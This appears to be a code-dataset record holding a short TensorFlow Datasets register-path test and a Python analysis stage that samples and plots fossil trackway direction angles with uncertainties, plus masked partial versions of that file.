"step-3": "<mask token>\nfrom etils import epath\nfrom tensorflow_datasets.core.community import register_path\n\n\ndef test_data_dir_register():\n register = register_path.DataDirRegister(namespace_to_data_dirs={'ns1':\n [epath.Path('/path/ns1')]})\n assert {'ns1'} == register.namespaces\n",
"step-4": "# coding=utf-8\n# Copyright 2022 The TensorFlow Datasets Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Tests for tensorflow_datasets.core.community.register_path.\"\"\"\n\nfrom etils import epath\nfrom tensorflow_datasets.core.community import register_path\n\n\ndef test_data_dir_register():\n register = register_path.DataDirRegister(\n namespace_to_data_dirs={'ns1': [epath.Path('/path/ns1')]})\n assert {'ns1'} == register.namespaces\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# TrackwayDirectionStage.py
# (C)2014-2015
# Scott Ernst
from __future__ import print_function, absolute_import, unicode_literals, division
from collections import namedtuple
import math
from pyaid.number.NumericUtils import NumericUtils
from cadence.analysis.CurveOrderedAnalysisStage import CurveOrderedAnalysisStage
from cadence.analysis.shared.LineSegment2D import LineSegment2D
from pyaid.number.PositionValue2D import PositionValue2D
from cadence.analysis.shared.plotting.MultiScatterPlot import MultiScatterPlot
from cadence.svg.CadenceDrawing import CadenceDrawing
#*************************************************************************************************** TrackwayDirectionStage
class TrackwayDirectionStage(CurveOrderedAnalysisStage):
"""A class for..."""
#===============================================================================
# C L A S S
SAMPLE_DATA_NT = namedtuple('SAMPLE_DATA_NT', [
'directionAngle', # Angle instance for the calculated trackway heading
'position', # Spatial position of the angle reference point
'curvePoint', # For plotting (curvePosition, directionAngle, curvePosUnc, directionAngleUnc)
'curvePosition', # ValueUncertainty object representing position along curve
'track' ]) # Track used to reference this sample
MAPS_FOLDER_NAME = 'Trackway-Direction'
COLORS = ['#AAAAAA', 'black', 'blue', 'green', 'red']
#_______________________________________________________________________________
def __init__(self, key, owner, **kwargs):
"""Creates a new instance of TrackwayDirectionStage."""
super(TrackwayDirectionStage, self).__init__(
key, owner,
label='Trackway Direction',
**kwargs)
self._paths = []
#===============================================================================
# G E T / S E T
#_______________________________________________________________________________
@property
def trackHeadingData(self):
return self.owner.getStage('heading').trackwaysData
#_______________________________________________________________________________
@property
def trackwayDirectionData(self):
return self.owner.cache.get('trackwayDirectionData')
#===============================================================================
# P R O T E C T E D
#_______________________________________________________________________________
def _preAnalyze(self):
self.owner.cache.set('trackwayDirectionData', {})
#_______________________________________________________________________________
def _analyzeSitemap(self, sitemap):
"""_analyzeSitemap doc..."""
self._createDrawing(sitemap, 'SAMPLED-DIRECTION', self.MAPS_FOLDER_NAME)
super(TrackwayDirectionStage, self)._analyzeSitemap(sitemap)
self._saveDrawing(sitemap)
#_______________________________________________________________________________
def _analyzeTrackway(self, trackway, sitemap):
if trackway.uid not in self.trackHeadingData:
return
bundle = self.owner.getSeriesBundle(trackway)
        # Create a list of window sizes to test, trimmed to account for small trackways with
        # fewer points than a specified size
maxWindowSize = min(8, int(0.5*float(bundle.count)))
windowSizes = [1, 2, 4, 6, 8]
while maxWindowSize < windowSizes[-1]:
windowSizes.pop()
samples = []
for i in windowSizes:
# For each valid window size create a sample entry
samples.append({'size':i + 1, 'values':self._sampleTrackway(trackway, i + 1) })
self._plotTrackwaySamples(trackway, samples)
self._drawTrackwaySamples(sitemap, samples)
self.trackwayDirectionData[trackway.uid] = {'trackway':trackway, 'samples':samples}
#_______________________________________________________________________________
def _drawTrackwaySamples(self, sitemap, samples):
"""_drawTrackwaySamples doc..."""
drawing = sitemap.cache.get('drawing')
for sample in samples:
color = self.COLORS[samples.index(sample)]
if len(sample['values']) < 2:
continue
prev = sample['values'][0].position
for value in sample['values'][1:]:
pos = value.position
drawing.line(
prev.toMayaTuple(), pos.toMayaTuple(),
stroke=color, stroke_width=1, stroke_opacity='0.75')
prev = pos
for value in sample['values']:
pos = value.position
drawing.circle(
pos.toMayaTuple(), 5,
stroke='none', fill=color, fill_opacity='0.75')
#_______________________________________________________________________________
def _plotTrackwaySamples(self, trackway, samples):
"""_plotTrackwaySamples doc..."""
bundle = self.owner.getSeriesBundle(trackway)
plot = MultiScatterPlot(
title='%s Direction Sampling %s' % (trackway.name, bundle.echoStatus(asPercent=True)),
xLabel='Trackway Curve Position (m)',
yLabel='Direction (degrees)')
for sample in samples:
color = self.COLORS[samples.index(sample)]
data = []
for value in sample['values']:
data.append(value.curvePoint)
plot.addPlotSeries(data=data, color=color, line=True)
self._paths.append(plot.save(self.getTempFilePath(extension='pdf')))
#_______________________________________________________________________________
def _sampleTrackway(self, trackway, windowSize):
"""
Samples the trackway and returns result
@type trackway: * """
window = []
samples = []
entries = self.trackHeadingData[trackway.uid]['entries']
analysisTrackway = trackway.getAnalysisPair(self.analysisSession)
for entry in entries:
# For each track entry in the trackways data add that to the sample window and update
# the samples result
window.append(entry)
if len(window) < windowSize:
# Don't create a sample until the sub-sample list exceeds the sample window size
continue
xTests = [] # X spatial position values
yTests = [] # Y spatial position values
angleTests = [] # Heading angle values
curvePosTests = [] # Curve position values
for item in window:
# Calculate weighted averages for various properties of the current sample window
angle = item.headingAngle
angleTests.append(angle.valueDegrees)
# Create a ValueUncertainty for the curve position by using the fractional
# positional uncertainty over the spatial length of the curve
posValue = item.track.positionValue
posUnc = math.sqrt(posValue.xUnc**2 + posValue.yUnc**2)
curvePos = item.track.getAnalysisPair(self.analysisSession).curvePosition
curvePosUnc = abs(posUnc/analysisTrackway.curveLength)
curvePosTests.append(NumericUtils.toValueUncertainty(curvePos, curvePosUnc))
pv = item.track.positionValue
xTests.append(pv.xValue)
yTests.append(pv.yValue)
directionAngleMean = NumericUtils.weightedAverage(*angleTests)
curvePositionMean = NumericUtils.weightedAverage(*curvePosTests)
xValue = NumericUtils.weightedAverage(*xTests)
yValue = NumericUtils.weightedAverage(*yTests)
position = PositionValue2D(
x=xValue.raw, xUnc=xValue.rawUncertainty,
y=yValue.raw, yUnc=yValue.rawUncertainty)
            # Remove the oldest sample from the window to make room for a new sample in the next iteration
window.pop(0)
if len(samples) > 0:
                # Compare this sample to the previous one and if it does not differ
                # significantly then continue to the next iteration
last = samples[-1].directionAngle
totalUnc = last.rawUncertainty + directionAngleMean.rawUncertainty
deviation = abs(directionAngleMean.raw - last.raw)/totalUnc
if deviation < 2.0:
continue
samples.append(self.SAMPLE_DATA_NT(
directionAngle=directionAngleMean,
position=position,
curvePoint=(
curvePositionMean.value, directionAngleMean.value,
curvePositionMean.uncertainty, directionAngleMean.uncertainty),
curvePosition=curvePositionMean,
track=entry.track ))
self._extendSamplesToTrackwayStart(entries[0], samples)
self._extendSampleToTrackwayEnd(entries[-1], samples)
return samples
#_______________________________________________________________________________
def _extendSamplesToTrackwayStart(self, firstEntry, samples):
"""_extendSamplesToTrackwayStart doc..."""
if len(samples) < 2 or samples[0].track == firstEntry.track:
            # If there aren't enough samples, or the samples already extend to the start of the
            # trackway, return the samples without adding on a start point
return
line = LineSegment2D(
start=samples[0].position.clone(),
end=samples[1].position.clone())
firstTrack = firstEntry.track
analysisTrack = firstTrack.getAnalysisPair(self.analysisSession)
position = line.closestPointOnLine(firstTrack.positionValue, False)
samples.insert(0, self.SAMPLE_DATA_NT(
directionAngle=samples[0].directionAngle.clone(),
position=position,
curvePoint=(
analysisTrack.curvePosition, samples[0].directionAngle.value,
0, samples[-1].directionAngle.uncertainty),
curvePosition=samples[0].curvePosition.clone(),
track=firstTrack ))
#_______________________________________________________________________________
def _extendSampleToTrackwayEnd(self, lastEntry, samples):
if len(samples) < 2 or samples[-1].track == lastEntry.track:
# If there aren't enough samples, or the samples already extend to the end of the
# trackway, return the samples without adding on an end point
return
line = LineSegment2D(
start=samples[-2].position.clone(),
end=samples[-1].position.clone())
lastTrack = lastEntry.track
analysisTrack = lastTrack.getAnalysisPair(self.analysisSession)
position = line.closestPointOnLine(lastTrack.positionValue, False)
ha = samples[-1].directionAngle.clone()
samples.append(self.SAMPLE_DATA_NT(
directionAngle=ha,
position=position,
curvePoint=(analysisTrack.curvePosition, ha.value, 0, ha.uncertainty),
curvePosition=samples[-1].curvePosition.clone(),
track=lastTrack ))
#_______________________________________________________________________________
def _postAnalyze(self):
self.mergePdfs(self._paths, 'Trackway-Direction.pdf')
|
normal
|
{
"blob_id": "a721adaaa69bf09c2ea259f12bea05515c818679",
"index": 5327,
"step-1": "<mask token>\n\n\nclass TrackwayDirectionStage(CurveOrderedAnalysisStage):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, key, owner, **kwargs):\n \"\"\"Creates a new instance of TrackwayDirectionStage.\"\"\"\n super(TrackwayDirectionStage, self).__init__(key, owner, label=\n 'Trackway Direction', **kwargs)\n self._paths = []\n\n @property\n def trackHeadingData(self):\n return self.owner.getStage('heading').trackwaysData\n\n @property\n def trackwayDirectionData(self):\n return self.owner.cache.get('trackwayDirectionData')\n <mask token>\n\n def _analyzeSitemap(self, sitemap):\n \"\"\"_analyzeSitemap doc...\"\"\"\n self._createDrawing(sitemap, 'SAMPLED-DIRECTION', self.MAPS_FOLDER_NAME\n )\n super(TrackwayDirectionStage, self)._analyzeSitemap(sitemap)\n self._saveDrawing(sitemap)\n\n def _analyzeTrackway(self, trackway, sitemap):\n if trackway.uid not in self.trackHeadingData:\n return\n bundle = self.owner.getSeriesBundle(trackway)\n maxWindowSize = min(8, int(0.5 * float(bundle.count)))\n windowSizes = [1, 2, 4, 6, 8]\n while maxWindowSize < windowSizes[-1]:\n windowSizes.pop()\n samples = []\n for i in windowSizes:\n samples.append({'size': i + 1, 'values': self._sampleTrackway(\n trackway, i + 1)})\n self._plotTrackwaySamples(trackway, samples)\n self._drawTrackwaySamples(sitemap, samples)\n self.trackwayDirectionData[trackway.uid] = {'trackway': trackway,\n 'samples': samples}\n <mask token>\n <mask token>\n\n def _sampleTrackway(self, trackway, windowSize):\n \"\"\"\n Samples the trackway and returns result\n @type trackway: * \"\"\"\n window = []\n samples = []\n entries = self.trackHeadingData[trackway.uid]['entries']\n analysisTrackway = trackway.getAnalysisPair(self.analysisSession)\n for entry in entries:\n window.append(entry)\n if len(window) < windowSize:\n continue\n xTests = []\n yTests = []\n angleTests = []\n curvePosTests = []\n for item in window:\n angle = item.headingAngle\n angleTests.append(angle.valueDegrees)\n posValue = item.track.positionValue\n posUnc = math.sqrt(posValue.xUnc ** 2 + posValue.yUnc ** 2)\n curvePos = item.track.getAnalysisPair(self.analysisSession\n ).curvePosition\n curvePosUnc = abs(posUnc / analysisTrackway.curveLength)\n curvePosTests.append(NumericUtils.toValueUncertainty(\n curvePos, curvePosUnc))\n pv = item.track.positionValue\n xTests.append(pv.xValue)\n yTests.append(pv.yValue)\n directionAngleMean = NumericUtils.weightedAverage(*angleTests)\n curvePositionMean = NumericUtils.weightedAverage(*curvePosTests)\n xValue = NumericUtils.weightedAverage(*xTests)\n yValue = NumericUtils.weightedAverage(*yTests)\n position = PositionValue2D(x=xValue.raw, xUnc=xValue.\n rawUncertainty, y=yValue.raw, yUnc=yValue.rawUncertainty)\n window.pop(0)\n if len(samples) > 0:\n last = samples[-1].directionAngle\n totalUnc = (last.rawUncertainty + directionAngleMean.\n rawUncertainty)\n deviation = abs(directionAngleMean.raw - last.raw) / totalUnc\n if deviation < 2.0:\n continue\n samples.append(self.SAMPLE_DATA_NT(directionAngle=\n directionAngleMean, position=position, curvePoint=(\n curvePositionMean.value, directionAngleMean.value,\n curvePositionMean.uncertainty, directionAngleMean.\n uncertainty), curvePosition=curvePositionMean, track=entry.\n track))\n self._extendSamplesToTrackwayStart(entries[0], samples)\n self._extendSampleToTrackwayEnd(entries[-1], samples)\n return samples\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TrackwayDirectionStage(CurveOrderedAnalysisStage):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, key, owner, **kwargs):\n \"\"\"Creates a new instance of TrackwayDirectionStage.\"\"\"\n super(TrackwayDirectionStage, self).__init__(key, owner, label=\n 'Trackway Direction', **kwargs)\n self._paths = []\n\n @property\n def trackHeadingData(self):\n return self.owner.getStage('heading').trackwaysData\n\n @property\n def trackwayDirectionData(self):\n return self.owner.cache.get('trackwayDirectionData')\n\n def _preAnalyze(self):\n self.owner.cache.set('trackwayDirectionData', {})\n\n def _analyzeSitemap(self, sitemap):\n \"\"\"_analyzeSitemap doc...\"\"\"\n self._createDrawing(sitemap, 'SAMPLED-DIRECTION', self.MAPS_FOLDER_NAME\n )\n super(TrackwayDirectionStage, self)._analyzeSitemap(sitemap)\n self._saveDrawing(sitemap)\n\n def _analyzeTrackway(self, trackway, sitemap):\n if trackway.uid not in self.trackHeadingData:\n return\n bundle = self.owner.getSeriesBundle(trackway)\n maxWindowSize = min(8, int(0.5 * float(bundle.count)))\n windowSizes = [1, 2, 4, 6, 8]\n while maxWindowSize < windowSizes[-1]:\n windowSizes.pop()\n samples = []\n for i in windowSizes:\n samples.append({'size': i + 1, 'values': self._sampleTrackway(\n trackway, i + 1)})\n self._plotTrackwaySamples(trackway, samples)\n self._drawTrackwaySamples(sitemap, samples)\n self.trackwayDirectionData[trackway.uid] = {'trackway': trackway,\n 'samples': samples}\n <mask token>\n <mask token>\n\n def _sampleTrackway(self, trackway, windowSize):\n \"\"\"\n Samples the trackway and returns result\n @type trackway: * \"\"\"\n window = []\n samples = []\n entries = self.trackHeadingData[trackway.uid]['entries']\n analysisTrackway = trackway.getAnalysisPair(self.analysisSession)\n for entry in entries:\n window.append(entry)\n if len(window) < windowSize:\n continue\n xTests = []\n yTests = []\n angleTests = []\n curvePosTests = []\n for item in window:\n angle = item.headingAngle\n angleTests.append(angle.valueDegrees)\n posValue = item.track.positionValue\n posUnc = math.sqrt(posValue.xUnc ** 2 + posValue.yUnc ** 2)\n curvePos = item.track.getAnalysisPair(self.analysisSession\n ).curvePosition\n curvePosUnc = abs(posUnc / analysisTrackway.curveLength)\n curvePosTests.append(NumericUtils.toValueUncertainty(\n curvePos, curvePosUnc))\n pv = item.track.positionValue\n xTests.append(pv.xValue)\n yTests.append(pv.yValue)\n directionAngleMean = NumericUtils.weightedAverage(*angleTests)\n curvePositionMean = NumericUtils.weightedAverage(*curvePosTests)\n xValue = NumericUtils.weightedAverage(*xTests)\n yValue = NumericUtils.weightedAverage(*yTests)\n position = PositionValue2D(x=xValue.raw, xUnc=xValue.\n rawUncertainty, y=yValue.raw, yUnc=yValue.rawUncertainty)\n window.pop(0)\n if len(samples) > 0:\n last = samples[-1].directionAngle\n totalUnc = (last.rawUncertainty + directionAngleMean.\n rawUncertainty)\n deviation = abs(directionAngleMean.raw - last.raw) / totalUnc\n if deviation < 2.0:\n continue\n samples.append(self.SAMPLE_DATA_NT(directionAngle=\n directionAngleMean, position=position, curvePoint=(\n curvePositionMean.value, directionAngleMean.value,\n curvePositionMean.uncertainty, directionAngleMean.\n uncertainty), curvePosition=curvePositionMean, track=entry.\n track))\n self._extendSamplesToTrackwayStart(entries[0], samples)\n self._extendSampleToTrackwayEnd(entries[-1], samples)\n return samples\n <mask token>\n\n def _extendSampleToTrackwayEnd(self, 
lastEntry, samples):\n if len(samples) < 2 or samples[-1].track == lastEntry.track:\n return\n line = LineSegment2D(start=samples[-2].position.clone(), end=\n samples[-1].position.clone())\n lastTrack = lastEntry.track\n analysisTrack = lastTrack.getAnalysisPair(self.analysisSession)\n position = line.closestPointOnLine(lastTrack.positionValue, False)\n ha = samples[-1].directionAngle.clone()\n samples.append(self.SAMPLE_DATA_NT(directionAngle=ha, position=\n position, curvePoint=(analysisTrack.curvePosition, ha.value, 0,\n ha.uncertainty), curvePosition=samples[-1].curvePosition.clone(\n ), track=lastTrack))\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass TrackwayDirectionStage(CurveOrderedAnalysisStage):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, key, owner, **kwargs):\n \"\"\"Creates a new instance of TrackwayDirectionStage.\"\"\"\n super(TrackwayDirectionStage, self).__init__(key, owner, label=\n 'Trackway Direction', **kwargs)\n self._paths = []\n\n @property\n def trackHeadingData(self):\n return self.owner.getStage('heading').trackwaysData\n\n @property\n def trackwayDirectionData(self):\n return self.owner.cache.get('trackwayDirectionData')\n\n def _preAnalyze(self):\n self.owner.cache.set('trackwayDirectionData', {})\n\n def _analyzeSitemap(self, sitemap):\n \"\"\"_analyzeSitemap doc...\"\"\"\n self._createDrawing(sitemap, 'SAMPLED-DIRECTION', self.MAPS_FOLDER_NAME\n )\n super(TrackwayDirectionStage, self)._analyzeSitemap(sitemap)\n self._saveDrawing(sitemap)\n\n def _analyzeTrackway(self, trackway, sitemap):\n if trackway.uid not in self.trackHeadingData:\n return\n bundle = self.owner.getSeriesBundle(trackway)\n maxWindowSize = min(8, int(0.5 * float(bundle.count)))\n windowSizes = [1, 2, 4, 6, 8]\n while maxWindowSize < windowSizes[-1]:\n windowSizes.pop()\n samples = []\n for i in windowSizes:\n samples.append({'size': i + 1, 'values': self._sampleTrackway(\n trackway, i + 1)})\n self._plotTrackwaySamples(trackway, samples)\n self._drawTrackwaySamples(sitemap, samples)\n self.trackwayDirectionData[trackway.uid] = {'trackway': trackway,\n 'samples': samples}\n <mask token>\n\n def _plotTrackwaySamples(self, trackway, samples):\n \"\"\"_plotTrackwaySamples doc...\"\"\"\n bundle = self.owner.getSeriesBundle(trackway)\n plot = MultiScatterPlot(title='%s Direction Sampling %s' % (\n trackway.name, bundle.echoStatus(asPercent=True)), xLabel=\n 'Trackway Curve Position (m)', yLabel='Direction (degrees)')\n for sample in samples:\n color = self.COLORS[samples.index(sample)]\n data = []\n for value in sample['values']:\n data.append(value.curvePoint)\n plot.addPlotSeries(data=data, color=color, line=True)\n self._paths.append(plot.save(self.getTempFilePath(extension='pdf')))\n\n def _sampleTrackway(self, trackway, windowSize):\n \"\"\"\n Samples the trackway and returns result\n @type trackway: * \"\"\"\n window = []\n samples = []\n entries = self.trackHeadingData[trackway.uid]['entries']\n analysisTrackway = trackway.getAnalysisPair(self.analysisSession)\n for entry in entries:\n window.append(entry)\n if len(window) < windowSize:\n continue\n xTests = []\n yTests = []\n angleTests = []\n curvePosTests = []\n for item in window:\n angle = item.headingAngle\n angleTests.append(angle.valueDegrees)\n posValue = item.track.positionValue\n posUnc = math.sqrt(posValue.xUnc ** 2 + posValue.yUnc ** 2)\n curvePos = item.track.getAnalysisPair(self.analysisSession\n ).curvePosition\n curvePosUnc = abs(posUnc / analysisTrackway.curveLength)\n curvePosTests.append(NumericUtils.toValueUncertainty(\n curvePos, curvePosUnc))\n pv = item.track.positionValue\n xTests.append(pv.xValue)\n yTests.append(pv.yValue)\n directionAngleMean = NumericUtils.weightedAverage(*angleTests)\n curvePositionMean = NumericUtils.weightedAverage(*curvePosTests)\n xValue = NumericUtils.weightedAverage(*xTests)\n yValue = NumericUtils.weightedAverage(*yTests)\n position = PositionValue2D(x=xValue.raw, xUnc=xValue.\n rawUncertainty, y=yValue.raw, yUnc=yValue.rawUncertainty)\n window.pop(0)\n if len(samples) > 0:\n last = samples[-1].directionAngle\n totalUnc = (last.rawUncertainty + 
directionAngleMean.\n rawUncertainty)\n deviation = abs(directionAngleMean.raw - last.raw) / totalUnc\n if deviation < 2.0:\n continue\n samples.append(self.SAMPLE_DATA_NT(directionAngle=\n directionAngleMean, position=position, curvePoint=(\n curvePositionMean.value, directionAngleMean.value,\n curvePositionMean.uncertainty, directionAngleMean.\n uncertainty), curvePosition=curvePositionMean, track=entry.\n track))\n self._extendSamplesToTrackwayStart(entries[0], samples)\n self._extendSampleToTrackwayEnd(entries[-1], samples)\n return samples\n\n def _extendSamplesToTrackwayStart(self, firstEntry, samples):\n \"\"\"_extendSamplesToTrackwayStart doc...\"\"\"\n if len(samples) < 2 or samples[0].track == firstEntry.track:\n return\n line = LineSegment2D(start=samples[0].position.clone(), end=samples\n [1].position.clone())\n firstTrack = firstEntry.track\n analysisTrack = firstTrack.getAnalysisPair(self.analysisSession)\n position = line.closestPointOnLine(firstTrack.positionValue, False)\n samples.insert(0, self.SAMPLE_DATA_NT(directionAngle=samples[0].\n directionAngle.clone(), position=position, curvePoint=(\n analysisTrack.curvePosition, samples[0].directionAngle.value, 0,\n samples[-1].directionAngle.uncertainty), curvePosition=samples[\n 0].curvePosition.clone(), track=firstTrack))\n\n def _extendSampleToTrackwayEnd(self, lastEntry, samples):\n if len(samples) < 2 or samples[-1].track == lastEntry.track:\n return\n line = LineSegment2D(start=samples[-2].position.clone(), end=\n samples[-1].position.clone())\n lastTrack = lastEntry.track\n analysisTrack = lastTrack.getAnalysisPair(self.analysisSession)\n position = line.closestPointOnLine(lastTrack.positionValue, False)\n ha = samples[-1].directionAngle.clone()\n samples.append(self.SAMPLE_DATA_NT(directionAngle=ha, position=\n position, curvePoint=(analysisTrack.curvePosition, ha.value, 0,\n ha.uncertainty), curvePosition=samples[-1].curvePosition.clone(\n ), track=lastTrack))\n <mask token>\n",
"step-4": "<mask token>\n\n\nclass TrackwayDirectionStage(CurveOrderedAnalysisStage):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, key, owner, **kwargs):\n \"\"\"Creates a new instance of TrackwayDirectionStage.\"\"\"\n super(TrackwayDirectionStage, self).__init__(key, owner, label=\n 'Trackway Direction', **kwargs)\n self._paths = []\n\n @property\n def trackHeadingData(self):\n return self.owner.getStage('heading').trackwaysData\n\n @property\n def trackwayDirectionData(self):\n return self.owner.cache.get('trackwayDirectionData')\n\n def _preAnalyze(self):\n self.owner.cache.set('trackwayDirectionData', {})\n\n def _analyzeSitemap(self, sitemap):\n \"\"\"_analyzeSitemap doc...\"\"\"\n self._createDrawing(sitemap, 'SAMPLED-DIRECTION', self.MAPS_FOLDER_NAME\n )\n super(TrackwayDirectionStage, self)._analyzeSitemap(sitemap)\n self._saveDrawing(sitemap)\n\n def _analyzeTrackway(self, trackway, sitemap):\n if trackway.uid not in self.trackHeadingData:\n return\n bundle = self.owner.getSeriesBundle(trackway)\n maxWindowSize = min(8, int(0.5 * float(bundle.count)))\n windowSizes = [1, 2, 4, 6, 8]\n while maxWindowSize < windowSizes[-1]:\n windowSizes.pop()\n samples = []\n for i in windowSizes:\n samples.append({'size': i + 1, 'values': self._sampleTrackway(\n trackway, i + 1)})\n self._plotTrackwaySamples(trackway, samples)\n self._drawTrackwaySamples(sitemap, samples)\n self.trackwayDirectionData[trackway.uid] = {'trackway': trackway,\n 'samples': samples}\n\n def _drawTrackwaySamples(self, sitemap, samples):\n \"\"\"_drawTrackwaySamples doc...\"\"\"\n drawing = sitemap.cache.get('drawing')\n for sample in samples:\n color = self.COLORS[samples.index(sample)]\n if len(sample['values']) < 2:\n continue\n prev = sample['values'][0].position\n for value in sample['values'][1:]:\n pos = value.position\n drawing.line(prev.toMayaTuple(), pos.toMayaTuple(), stroke=\n color, stroke_width=1, stroke_opacity='0.75')\n prev = pos\n for value in sample['values']:\n pos = value.position\n drawing.circle(pos.toMayaTuple(), 5, stroke='none', fill=\n color, fill_opacity='0.75')\n\n def _plotTrackwaySamples(self, trackway, samples):\n \"\"\"_plotTrackwaySamples doc...\"\"\"\n bundle = self.owner.getSeriesBundle(trackway)\n plot = MultiScatterPlot(title='%s Direction Sampling %s' % (\n trackway.name, bundle.echoStatus(asPercent=True)), xLabel=\n 'Trackway Curve Position (m)', yLabel='Direction (degrees)')\n for sample in samples:\n color = self.COLORS[samples.index(sample)]\n data = []\n for value in sample['values']:\n data.append(value.curvePoint)\n plot.addPlotSeries(data=data, color=color, line=True)\n self._paths.append(plot.save(self.getTempFilePath(extension='pdf')))\n\n def _sampleTrackway(self, trackway, windowSize):\n \"\"\"\n Samples the trackway and returns result\n @type trackway: * \"\"\"\n window = []\n samples = []\n entries = self.trackHeadingData[trackway.uid]['entries']\n analysisTrackway = trackway.getAnalysisPair(self.analysisSession)\n for entry in entries:\n window.append(entry)\n if len(window) < windowSize:\n continue\n xTests = []\n yTests = []\n angleTests = []\n curvePosTests = []\n for item in window:\n angle = item.headingAngle\n angleTests.append(angle.valueDegrees)\n posValue = item.track.positionValue\n posUnc = math.sqrt(posValue.xUnc ** 2 + posValue.yUnc ** 2)\n curvePos = item.track.getAnalysisPair(self.analysisSession\n ).curvePosition\n curvePosUnc = abs(posUnc / analysisTrackway.curveLength)\n 
curvePosTests.append(NumericUtils.toValueUncertainty(\n curvePos, curvePosUnc))\n pv = item.track.positionValue\n xTests.append(pv.xValue)\n yTests.append(pv.yValue)\n directionAngleMean = NumericUtils.weightedAverage(*angleTests)\n curvePositionMean = NumericUtils.weightedAverage(*curvePosTests)\n xValue = NumericUtils.weightedAverage(*xTests)\n yValue = NumericUtils.weightedAverage(*yTests)\n position = PositionValue2D(x=xValue.raw, xUnc=xValue.\n rawUncertainty, y=yValue.raw, yUnc=yValue.rawUncertainty)\n window.pop(0)\n if len(samples) > 0:\n last = samples[-1].directionAngle\n totalUnc = (last.rawUncertainty + directionAngleMean.\n rawUncertainty)\n deviation = abs(directionAngleMean.raw - last.raw) / totalUnc\n if deviation < 2.0:\n continue\n samples.append(self.SAMPLE_DATA_NT(directionAngle=\n directionAngleMean, position=position, curvePoint=(\n curvePositionMean.value, directionAngleMean.value,\n curvePositionMean.uncertainty, directionAngleMean.\n uncertainty), curvePosition=curvePositionMean, track=entry.\n track))\n self._extendSamplesToTrackwayStart(entries[0], samples)\n self._extendSampleToTrackwayEnd(entries[-1], samples)\n return samples\n\n def _extendSamplesToTrackwayStart(self, firstEntry, samples):\n \"\"\"_extendSamplesToTrackwayStart doc...\"\"\"\n if len(samples) < 2 or samples[0].track == firstEntry.track:\n return\n line = LineSegment2D(start=samples[0].position.clone(), end=samples\n [1].position.clone())\n firstTrack = firstEntry.track\n analysisTrack = firstTrack.getAnalysisPair(self.analysisSession)\n position = line.closestPointOnLine(firstTrack.positionValue, False)\n samples.insert(0, self.SAMPLE_DATA_NT(directionAngle=samples[0].\n directionAngle.clone(), position=position, curvePoint=(\n analysisTrack.curvePosition, samples[0].directionAngle.value, 0,\n samples[-1].directionAngle.uncertainty), curvePosition=samples[\n 0].curvePosition.clone(), track=firstTrack))\n\n def _extendSampleToTrackwayEnd(self, lastEntry, samples):\n if len(samples) < 2 or samples[-1].track == lastEntry.track:\n return\n line = LineSegment2D(start=samples[-2].position.clone(), end=\n samples[-1].position.clone())\n lastTrack = lastEntry.track\n analysisTrack = lastTrack.getAnalysisPair(self.analysisSession)\n position = line.closestPointOnLine(lastTrack.positionValue, False)\n ha = samples[-1].directionAngle.clone()\n samples.append(self.SAMPLE_DATA_NT(directionAngle=ha, position=\n position, curvePoint=(analysisTrack.curvePosition, ha.value, 0,\n ha.uncertainty), curvePosition=samples[-1].curvePosition.clone(\n ), track=lastTrack))\n\n def _postAnalyze(self):\n self.mergePdfs(self._paths, 'Trackway-Direction.pdf')\n",
"step-5": "# TrackwayDirectionStage.py\n# (C)2014-2015\n# Scott Ernst\n\nfrom __future__ import print_function, absolute_import, unicode_literals, division\n\nfrom collections import namedtuple\nimport math\n\nfrom pyaid.number.NumericUtils import NumericUtils\n\nfrom cadence.analysis.CurveOrderedAnalysisStage import CurveOrderedAnalysisStage\nfrom cadence.analysis.shared.LineSegment2D import LineSegment2D\nfrom pyaid.number.PositionValue2D import PositionValue2D\nfrom cadence.analysis.shared.plotting.MultiScatterPlot import MultiScatterPlot\nfrom cadence.svg.CadenceDrawing import CadenceDrawing\n\n#*************************************************************************************************** TrackwayDirectionStage\nclass TrackwayDirectionStage(CurveOrderedAnalysisStage):\n \"\"\"A class for...\"\"\"\n\n#===============================================================================\n# C L A S S\n\n SAMPLE_DATA_NT = namedtuple('SAMPLE_DATA_NT', [\n 'directionAngle', # Angle instance for the calculated trackway heading\n 'position', # Spatial position of the angle reference point\n 'curvePoint', # For plotting (curvePosition, directionAngle, curvePosUnc, directionAngleUnc)\n 'curvePosition', # ValueUncertainty object representing position along curve\n 'track' ]) # Track used to reference this sample\n\n MAPS_FOLDER_NAME = 'Trackway-Direction'\n\n COLORS = ['#AAAAAA', 'black', 'blue', 'green', 'red']\n\n#_______________________________________________________________________________\n def __init__(self, key, owner, **kwargs):\n \"\"\"Creates a new instance of TrackwayDirectionStage.\"\"\"\n super(TrackwayDirectionStage, self).__init__(\n key, owner,\n label='Trackway Direction',\n **kwargs)\n self._paths = []\n\n#===============================================================================\n# G E T / S E T\n\n#_______________________________________________________________________________\n @property\n def trackHeadingData(self):\n return self.owner.getStage('heading').trackwaysData\n\n#_______________________________________________________________________________\n @property\n def trackwayDirectionData(self):\n return self.owner.cache.get('trackwayDirectionData')\n\n#===============================================================================\n# P R O T E C T E D\n\n#_______________________________________________________________________________\n def _preAnalyze(self):\n self.owner.cache.set('trackwayDirectionData', {})\n\n#_______________________________________________________________________________\n def _analyzeSitemap(self, sitemap):\n \"\"\"_analyzeSitemap doc...\"\"\"\n\n self._createDrawing(sitemap, 'SAMPLED-DIRECTION', self.MAPS_FOLDER_NAME)\n super(TrackwayDirectionStage, self)._analyzeSitemap(sitemap)\n self._saveDrawing(sitemap)\n\n#_______________________________________________________________________________\n def _analyzeTrackway(self, trackway, sitemap):\n if trackway.uid not in self.trackHeadingData:\n return\n\n bundle = self.owner.getSeriesBundle(trackway)\n\n # Create a list of window sizes to test trimmed to account for small 